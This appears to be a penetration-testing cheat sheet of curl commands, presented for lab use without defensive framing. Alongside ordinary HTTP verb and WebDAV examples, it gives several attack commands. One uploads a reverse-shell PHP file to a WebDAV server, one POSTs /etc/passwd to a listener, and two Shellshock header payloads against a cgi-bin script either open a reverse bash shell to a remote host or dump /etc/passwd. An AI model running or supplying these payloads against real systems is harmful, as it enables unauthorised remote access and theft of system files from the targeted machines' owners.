
Using CURL with different HTTP methods and specify path:
$ curl -v -X OPTIONS http://10.0.2.21/test/

Use CURL to with different Verbs:
$ curl -X PUT http://10.0.2.21 --upload-file file2.txt

$ curl -X DELETE 'http://example.com/webdav/test'

$ curl -X MOVE --header 'Destination:http://example.org/new.txt' 'http://example.com/old.txt'

Uploading File on WebDav Server with http 1.0 instead of PUT:
$ curl --upload-file  /root/Exploits/Web_Payloads/r.txt -v --url http://10.0.2.21/test/rshell.php -0 --http1.0

Send a file with POST method:
$ curl -XPOST http://127.0.0.1:4444 -d @/etc/passwd

Curl With Headers:
$ curl -H "Referer: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.69/443 0>&1" http://10.11.1.209/cgi-bin/printenv -vv
$ curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" http://10.11.1.209/cgi-bin/printenv

Web Application (Hidden)
$ curl 10.0.2.19/robots.txt -s | html2text

Internal &  External Links
$ curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

HTML Render
curl 10.11.1.71 -s -L | html2text -width '99' | uniq





References:
http://www.qed42.com/blog/using-curl-commands-webdav